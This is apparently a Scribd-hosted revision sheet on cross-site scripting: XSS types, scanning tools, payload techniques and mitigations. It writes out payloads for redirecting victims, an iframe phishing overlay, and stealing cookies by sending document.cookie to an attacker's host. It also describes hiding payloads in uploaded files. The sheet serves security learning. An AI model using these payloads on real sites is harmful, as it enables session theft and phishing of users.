Scribd
Upload
7 views3 pages

XSS Revision - 2

The document discusses various types of Cross-Site Scripting (XSS) vulnerabilities, including Blind XSS, Stored XSS, and DOM XSS, along with methods for exploitation and mitigation techniques. It also introduces tools like XSSHunter and ParamSpider for detecting XSS vulnerabilities and provides examples of payloads for different XSS attacks. Additionally, it emphasizes the importance of input sanitization and the use of Web Application Firewalls (WAF) to prevent XSS attacks.

Uploaded by

Aftab Shaikh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
7 views3 pages

XSS Revision - 2

The document discusses various types of Cross-Site Scripting (XSS) vulnerabilities, including Blind XSS, Stored XSS, and DOM XSS, along with methods for exploitation and mitigation techniques. It also introduces tools like XSSHunter and ParamSpider for detecting XSS vulnerabilities and provides examples of payloads for different XSS attacks. Additionally, it emphasizes the importance of input sanitization and the use of Web Application Firewalls (WAF) to prevent XSS attacks.

Uploaded by

Aftab Shaikh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

Blind XSS:

Sometimes in certain areas example in feedback forms or chat bots we do not have an
idea if XSS exists or not, in such a case we will create a payload where the server
will give us a response

This can be easily done by using XSSHunter where payloads as well as reports can be
easily created

Link: https://xsshunter.com/

Stored XSS:

If a web application stores our payload then such an XSS is called a Stored XSS.
Such fields can be found under “My Profile” Section.

DOM XSS

DOM XSS arises due to the fact that input comes from the source and gets executed
in the sink.

https://files.cdn.thinkific.com/file_uploads/359809/images/
2f6/041/306/1618132420695.jpg

DOM XSS Automated Scanner

Steps:

git clone https://github.com/dwisiswant0/findom-xss.git

git clone https://github.com/GerbenJavado/LinkFinder.git

cd LinkFinder

pip install -r requirements.txt

cd ..

cd findom-xss

nano findom-xss.sh

Change the path of linkfinder

Save and Quit

./findom-xss https://website.com

XSS Mouse Payloads:


Sometimes when keyboard payloads are blocked, we can perform XSS using mouse
payloads as developers fail to protect them from being bypassed. Some of the mouse
payloads are onmouseover, onmouseclick etc. A list can be found under resources.

XSS Polyglots:

Polyglots means someone who knows many languages. Combining it with XSS Payloads,
it basically means a payload combination of 2 or more payloads in order to trick
the web server and bypass many input checks.

A list of polyglot payloads can be found :


https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/
Intruders/XSS_Polyglots.txt

XSS to URL Redirection:

Using an injection point and crafting a specially based payload we can make the
victim redirect to an evil website.

The Payload will look something like this:


<script>document.href=”https://evilsite.com”</script>

XSS to Phishing:

Using an injection point and a specially crafted payload of iframe we can trick the
user to see a login screen and make the user log in thus phishing the user.

Payload: <iframe src=”https://evilsite.com” height=”100%” width=”100%”></iframe>

XSS to Cookie Stealing:

This technique can increase the severity of XSS. A simple payload where the cookie
of user will be redirected to the attacker’s web server.The payload can be as
follows:

<script>document.location.href=”attackers.website/cookie=”>+document.cookie</
script>

Where document.cookie will give the victims cookie and document.location.href will
send the data to attacker’s web server

XSS via File Upload:


Some web servers do not check the content of the file while uploading them. In such
a scenario an attacker can write the payload inside the file and upload the file on
the web application thus leading to XSS.

Where web servers only upload image files, using an exiftool we can create a new
parameter and add our payload in the value option and then upload the image file to
web application thus prompting the alert box

XSS Mitigations:

Input Sanitization

Encode all input characters

Usage of WAF

Filter Input on Arrival

Encode data on output

Use appropriate response headers

Content Security Policy

ParamSpider:

A tool which can find hidden parameters on a website. The tool can be installed
from https://github.com/devanshbatham/ParamSpider

Steps:

$ git clone https://github.com/devanshbatham/ParamSpider

$ cd ParamSpider

$ pip3 install -r requirements.txt

$ python3 paramspider.py --domain hackerone.com

$3133.7 Google Bug Bounty Writeup- XSS Vulnerability!:

https://www.pethuraj.com/blog/google-bug-bounty-writeup/

Best wishes,

Rohit Gautam & Shifa Cyclewala

You might also like